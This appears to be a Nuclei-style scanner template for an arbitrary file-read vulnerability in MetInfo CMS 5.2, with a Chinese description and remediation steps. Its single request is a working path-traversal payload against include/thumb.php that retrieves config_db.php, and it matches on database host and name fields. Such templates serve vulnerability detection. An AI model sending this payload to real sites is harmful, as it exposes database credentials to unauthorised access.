id: Metinfo-V5_2_thumb_php-FileRead
info:
  name: metinfo_5_2_thumb.php_read_file.py
  author:
  - l0ne1y
  description: |-
    Metinfo V5.2中thumb.php任意文件读取漏洞
    MetInfo是一款适合企业建站的开源免费CMS建站系统，MetInfo企业网站管理系统主要用于搭建企业网站，采用PHP+Mysql架构。

    Metinfo-V5.2中 include/thumb.php页面存在任意文件读取漏洞，攻击者可利用此漏洞来获取敏感信息。
  severity: high
  remediation: |-
    官方修复方案：<br />1、升级系统至无漏洞版本，或于官网下载安全补丁
    https://www.mituo.cn

    临时修复方案：<br />1、过滤\".\"，使用户在url中不能回溯上级目录。<br />2、正则匹配严格判断用户输入参数的格式，对用户传过来的文件名参数进行硬编码或统一编码，对文件类型进行白名单控制，对包含恶意字符或者空字符的参数进行拒绝。<br />3、禁止系统提供目录遍历服务，如：php.ini配置open_basedir限定文件访问范围。<br />4、文件路径保存至数据库，让用户提交文件对应ID下载文件。<br />5、用户下载文件之前进行权限校验。
requests:
- matchers:
  - type: dsl
    dsl:
    - status_code==200 && contains(body,"<?php") && contains(body,"con_db_host") &&
      contains(body,"con_db_name")
  matchers-condition: and
  path:
  - '{{BaseURL}}/include/thumb.php?x=1&y=/../../../config&dir=config_db.php'
  method: GET
